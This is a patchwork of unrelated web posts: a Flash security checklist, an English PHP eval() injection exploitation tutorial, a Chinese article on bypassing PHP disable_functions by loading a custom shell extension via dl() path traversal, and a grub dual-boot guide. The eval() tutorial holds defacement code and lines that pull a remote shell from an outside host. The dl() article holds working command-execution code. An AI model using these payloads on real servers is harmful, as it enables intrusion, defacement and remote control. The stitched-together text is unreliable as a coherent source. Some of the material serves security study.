sameDomain //只允许来自于本域的flash与html通讯，这是默认值
never //绝对禁止flash与页面的通讯

默认情况下的选项是sameDomain，这个时候某些场景下看起来也是足够安全了，但是我们还是能看到经常有程序允许将这个选项设置为always，而即使是sameDomain也不是在所有场景下都安全的，考虑如论坛这样的程序，上传和展现都是在同一个域的情况下，就不存在任何安全性可言了，我们强烈建议该选项为never，如果你选择sameDomain或者always我也希望你清楚自己在做什么。

allowNetworking控制flash与外部的网络通讯，可选的值包括：

all //允许使用所有的网络通讯，也是默认值
internal //flash不能与浏览器通讯如navigateToURL，但是可以调用其他的API
none //禁止任何的网络通讯

但是最近更新的flash客户端貌似是只要AllowScriptAccess被设置那么包括navigateToURL都不能使用，在官方文档上也只看到简简单单的一句道歉，但是这样的确从某些程度上提高了嵌入flash的安全性。但是即使不跳转，我们还是能做很多事情，当我们将flash直接嵌入到页面又没有设置allowNetworking时，我们就可以做csrf之类猥琐的事情，更要命的是这种形式的csrf支持POST请求，referer来源为swf文件所在地址或者为空，同时发送所有cookie而不像图片那些只能发送session cookie，而且基本没有任何的痕迹，基本秒杀那些没有做token保护的csrf防范了，之前的开心网犯的就是这个错误，我们强烈建议该选项为 none，如果你不选择这个建议你也要清楚自己在做什么。

0×03 flash安全的checklist

1 检查自己的网站的根目录的crossdomain.xml

好孩子：

http://mail.google.com/crossdomain.xml

http://youa.baidu.com/crossdomain.xml

http://www.adobe.com/crossdomain.xml

坏孩子：

http://www.youku.com/crossdomain.xml

http://www.renren.com/crossdomain.xml

http://www.taobao.com/crossdomain.xml

我承认所有的利用都离不开场景，有的时候如果实在没有办法修改这个crossdomain.xml（这个情况的确存在，譬如某些变态功能的需要），那么就可以考虑在应用程序获取数据时对提交的数据做校验，譬如当请求的头里包括x-flash-version时，就可以判定来源是flash而不予响应，但这的确不是一种优美的解决办法。

2 检查自己网站引入flash的代码

有AllowScriptAccess和allowNetworking么？如果没有，那是不是我这个应用设计已经很安全足够抵御各种攻击了?

如果想针对安全问题做测试，fly_flash是方便的攻击客户端的好伙伴（参见开心网蠕虫），如果想针对第一种错误的策略文件突破csrf等做测试就还得自己写源码了。另外，良好的设计的最大敌人就是坏的实现，原因也是各个程序之间天然的心之壁垒，猜猜

<embed allowscriptaccess=”always” allowscriptaccess=”never” height=384 width=454 src=http://www.80sec.com/fly_flash.swf?sec80=http://www.80sec.com/fly_flash.txt&x.swf wmode=”transparent” loop=”false” autostart=”false”>

这段代码的结果是什么?

##############################################################################
# [+]Title: [Eval() Vulnerability & Exploitation]
##############################################################################
# [+] About :
##############################################################################
# Written by : GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team : Tunisian Power Team ( DarkGh0st.Net )
##############################################################################
# [+] Summary:
# [1]-Introduction
# [2]-Detection
# [3]-Vulnerable Source code
# [4]-Exploiting..
##############################################################################

[1]-Introduction

eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,
although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
the problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such.
Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result.
We will even two different PHP source code using Eval (), the possibilities of PHP code injection and how how to use eval () can change the syntax of PHP code to execute.

=======================================================

[2]-Detection

PoC 1 :

http://[vuln_site]/evalinject.php?ev=<? phpinfo(); ?>

[ eval() execute the contents of the variable "ev" as PHP code ]

———-

PoC 2 :

http://[vuln_site]/evalinject.php?ev=phpinfo();

[ eval() execute the contents of the variable "ev" as PHP code (without tags) ]

———-

PoC 3 :

Changing the header or POST variable cited by: phpinfo () [or <? phpinfo ();> php code used . ]
(With the Tamper Data)

[ eval () execute a chain whose variable $ HTTP_USER_AGENT is so just
change your header in PHP code ]

=======================================================

[3]-Vulnerable Source code

PoC 1 :

<?php
$Ev = $_GET['ev'];
$string = ($Ev);
$string = preg_replace_callback(“/(<\?=)(.*?)\?>/si”,create_function(‘$string’,'ob_start();eval(“$string[2];”);$return = ob_get_contents();ob_end_clean();return $return;’),$string);
$string= preg_replace_callback(“/(<\?php|<\?)(.*?)\?>/si”,create_function(‘$string’,'ob_start();eval(“print $string[2];”);$return = ob_get_contents();ob_end_clean();return $return;’),$string);
echo $string;
?>

———-

PoC 2 :
<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
?>

———-

PoC 3 :

<?php
$string = stripslashes($HTTP_USER_AGENT);
$string = preg_replace_callback(“/(<\?=)(.*?)\?>/si”,create_function(‘$string’,'ob_start();eval(“$string[2];”);$return = ob_get_contents();ob_end_clean();return $return;’),$string);
$string= preg_replace_callback(“/(<\?php|<\?)(.*?)\?>/si”,create_function(‘$string’,'ob_start();eval(“print $string[2];”);$return = ob_get_contents();ob_end_clean();return $return;’),$string);
echo $string;
?>

=======================================================

[4]-Exploiting..

———-
Write or Create a page containing : Hacked by …
<?php $z=fopen(“index.php”,’w');fwrite($z,(“HACKED BY GlaDiaT0R”));fclose($z); ?>

or

$z=fopen(“index.php”,’w');fwrite($z,(“HACKED BY GlaDiaT0R”));fclose($z);
———-
To insert a remote page include using an url
<?php include(‘http://[website]/shell.txt’); ?>

or

include(‘http://[website]/shell.txt’);
———-
Insertion of a distant code in the vulnerable website
<?php $z=fopen(“shell.php”,’w');fwrite($z,file_get_contents(“http://[website]/shell.txt”));fclose($z); ?>

or

$z=fopen(“shell.php”,’w');fwrite($z,file_get_contents(“http://[website]/shell.txt”));fclose($z);
———-

Thank you for your
attention. I hope you understood the process to exploit the eval ()
vulnerability .

PHP是一款功能强大应用广泛的脚本语言，很大一部分网站都是使用PHP架构的。因为其提供了强大的文件操作功能和与系统交互的功能，所以大部分的服务器都对PHP做了严格的限制，包括使用open_basedir限制可以操作的目录以及使用disable_functions限制程序使用一些可以直接执行系统命令的函数如system，exec，passthru，shell_exec，proc_open等等。但是如果服务器没有对dl()函数做限制，一样可以利用dl()函数饶过这些限制。
dl()函数允许在php脚本里动态加载php模块，默认是加载extension_dir目录里的扩展，该选项是PHP_INI_SYSTEM范围可修改的，只能在php.ini或者apache主配置文件里修改。当然，你也可以通过enable_dl选项来关闭动态加载功能，而这个选项默认为On的，事实上也很少人注意到这个。dl()函数在设计时存在安全漏洞，可以用../这种目录遍历的方式指定加载任何一个目录里的so等扩展文件，extension_dir限制可以被随意饶过。所以我们可以上传自己的so文件，并且用dl函数加载这个so文件然后利用so文件里的函数执行其他操作，包括系统命令。

PHP_FUNCTION(dl)
{
pval **file;

#ifdef ZTS
if ((strncmp(sapi_module.name, “cgi”, 3)!=0) &&
(strcmp(sapi_module.name, “cli”)!=0) &&
(strncmp(sapi_module.name, “embed”, 5)!=0)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, “Not supported in multithreaded Web servers – use extension statements in your php.ini”);
RETURN_FALSE;
} //验证是否可以使用dl函数，在多线程web服务器里是禁止的
#endif

/* obtain arguments */
if (ZEND_NUM_ARGS() != 1 || zend_get_parameters_ex(1, &file) == FAILURE) {
WRONG_PARAM_COUNT;
}

convert_to_string_ex(file); //取得参数

if (!PG(enable_dl)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, “Dynamically loaded extentions aren’t enabled”);//验证是否enable_dl，默认为on
} else if (PG(safe_mode)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, “Dynamically loaded extensions aren’t allowed when running in Safe Mode”);//验证是否safe_mode打开
} else {
php_dl(*file, MODULE_TEMPORARY, return_value TSRMLS_CC); //开始调用加载
EG(full_tables_cleanup) = 1;
}

下面是开始处理模块的加载

void php_dl(pval *file, int type, pval *return_value TSRMLS_DC)
{
void *handle;
char *libpath;
zend_module_entry *module_entry, *tmp;
zend_module_entry *(*get_module)(void);
int error_type;
char *extension_dir; //定义一些变量
if (type==MODULE_PERSISTENT) {
/* Use the configuration hash directly, the INI mechanism is not yet initialized */
if (cfg_get_string(“extension_dir”, &extension_dir)==FAILURE) {
extension_dir = PHP_EXTENSION_DIR;
}
} else {
extension_dir = PG(extension_dir);
} //取得php.ini里的设置也就是extension_dir的目录

if (type==MODULE_TEMPORARY) {
error_type = E_WARNING;
} else {
error_type = E_CORE_WARNING;
}

if (extension_dir && extension_dir[0]){
int extension_dir_len = strlen(extension_dir);

libpath = emalloc(extension_dir_len+Z_STRLEN_P(file)+2);

if (IS_SLASH(extension_dir[extension_dir_len-1])) {
sprintf(libpath, “%s%s”, extension_dir, Z_STRVAL_P(file)); /* SAFE */
} else {
sprintf(libpath, “%s%c%s”, extension_dir, DEFAULT_SLASH, Z_STRVAL_P(file)); /* SAFE */
} //构造最终的so文件的位置，只是简单的附加，并没有对传入的参数做任何检查，包括open_basedir等
} else {
libpath = estrndup(Z_STRVAL_P(file), Z_STRLEN_P(file));
}
/* load dynamic symbol */
handle = DL_LOAD(libpath); //开始真正的调用了

看到了吧，我们可以调用任意的so了哦！下一步就是编写自己的so模块，并且调用他。按照官方提供的模块编写方法，我写了个很简单的，主要的导出函数loveshell如下：

PHP_FUNCTION(loveshell)

{
char *command;
int command_len;

if (ZEND_NUM_ARGS() != 1 || zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,”s”, &command, &command_len) == FAILURE) {
WRONG_PARAM_COUNT;
}
system(command);
zend_printf(“I recieve %s”,command);
}

注意由于php4和php5的结构不一样，所以如果想要能顺利调用扩展，那么在php4环境下就要将上面的代码放到php4环境下编译，php5的就要在php5环境下编译。我们将编写好的扩展上传到服务器，就可以利用下面的代码执行命令了：

<?php
dl(‘../../../../../../../../../www/users/www.cnbct.org/loveshell.so’);
$cmd=$_REQUEST[c].” 2>&1>tmp.txt”;
loveshell($cmd);
echo “<br>”;
echo file_get_contents(‘tmp.txt’);
?>

所以如果想保证服务器的安全，请将这个函数加到disable_functions里或者将安全模式打开吧，在安全模式下dl函数是无条件禁止的！：）

目前有很多方法进行双系统的安装，有些十分的繁琐。下面我们就看看有关在Windows 7下grub安装Fedora12（或Ubuntu 9.10）的一个聪明的办法，依然grub, 不需要boot.ini grldr.mbr

关于Windows 7与Fedora12（或Ubuntu ）双系统，网上有很多贴子，仔细搜索，都是抄来抄去的。刻盘、U盘，不在本人叙述范围，WUBI安装不在简单，有点难度，本人也不考虑，我们依旧用grub来安装。

怎么用grub来引导Fedora12（或Ubuntu ）呢？

方法A，一个高手会告诉你，用什么什么命令，一提到命令，我们这些菜鸟真的头大，还是刻盘来的简单（本人可不喜欢刻盘啊！）。

方法B，一个聪明人会告诉你，Windows 7没有boot.ini没关系，我们自己加一个，在填一个grldr.mbr到C盘根目录，boot.ini加一个grldr.mbr=选项……这方法真的很聪明！开机重启后选Ubuntu就可以进入模拟的Ubuntu livecd了，然后，cd /回车， sudo umount -l isodevice回车，就可以用光盘livecd的方法安装了。

这个方法有两个缺陷，1，Windows 7的C 盘填加好boot.ini grldr grldr.mbr menu.lst后重启，只能选Fedora12（或Ubuntu ）选项，进入模拟的Fedora12（或Ubuntu ）的 livecd ，选Windows 7选项，不能进入Windows 7（本人是这样，不知其他人如何？） 2，安装好Ubuntu后，要重新加入Windows 7启动项。

参考一下Windows 7和Windows XP的开机过程。

怎么能解决方法 B 的缺陷呢？这是一个聪明的做法，但能不能有更好一点的方法呢？

本人终于想出了第三种方法，偷梁换柱法。并实验成功。即然win7开机默认bootmgr，那么我们何不把grldr改名为bootmgr ，让win7找到这个假的bootmgr ，这个假的bootmgr是直接找menu.lst的，那样不就可以通过编写menu.lst模拟引导Linux的 livecd了吗？

是的，可以。

可是，Windows 7怎么开机？Windows 7是要通过bootmgr开机的？

别急，听我细细道来，我们把win7的C盘原有的bootmgr改个名字如改成：bootmg8，这个改了名字的bootmgr依旧是默认找寻 Windows 7的，就象改了名的grldr 依旧是默认menu.lst一样。然后，我们在menu.lst内加上一段bootmg8启动项，就可以从bootmg8启动Windows 7，写到这，不知大家明白了吗？附上一个win7开机图，大家参考：

Windows 7下grub引导Fedora 12 liveCD的C盘menu.lst内容如下：

# （1） Windows  
title 【1】启动Windows 7  
find --set-root /bootmg8  
chainloader /bootmg8  
boot  
title 【2】启动Fedora 12 liveCD on /dev/sda7 （此处回车进入）  
root （hd0,6）  
kernel /LiveOS/vmlinuz0 root=/dev/sda7 ro liveimg rhgb  
initrd /LiveOS/initrd0.img  
title 【3】启动Ubuntu9.10 live on /dev/sda1（此处回车进入）  
root （hd0,0）  
kernel （hd0,0）/vmlinuz boot=casper noacpi iso-scan/filename=/karmic-desktop-amd64.iso ro quiet splash --  
label check live-install  
initrd （hd0,0）/initrd.lz